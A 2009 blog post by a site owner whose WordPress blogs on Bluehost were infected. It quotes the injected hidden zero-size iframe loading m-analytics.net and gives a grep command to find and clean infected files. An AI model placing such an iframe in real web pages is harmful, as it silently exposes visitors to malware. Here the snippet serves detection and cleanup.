Did you get hit with the m-analytics hack?

June 24th, 2009
by Christopher Kusek (PKGuild)

I received an email the other day that I was affected malware! (WTF?!) Thanks Zuzia for the heads up! As I didn’t notice it since I was offline for a bit! :)

I did a little searching on this and all I could find was this! Help With WordPress Vulnerability and the problem is more or less indicated by the presence of the following code in your html and php files!

<iframe src="https://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To tell you the truth, this is pretty damn annoying! I’m still trying to track down the cause because it only hit me here (at Bluehost) where I host 7 blogs (Yes all 7 were hit) however at my other hosting service (iPower) where I host 3 blogs, I was not affected.  So I blame Bluehost! :)

Some tips (if you have shell access) to fix this, is to:

grep m-ana * –r

Then go through one by one and clean up your fricking files (omfg this sucks!) but I don’t really have the time to write a script for it, nor the scripting skillz around that ;)

So, if you’ve been affected, clean it up! If you haven’t be, hooray!

Oh, and sorry for anyone annoyed by the ‘malware site’ message popping up when visiting any of my sites!

Tags: , , ,
Posted in Baltimization, Blog, Christopher Kusek, Technology | Comments (0)

  • Archives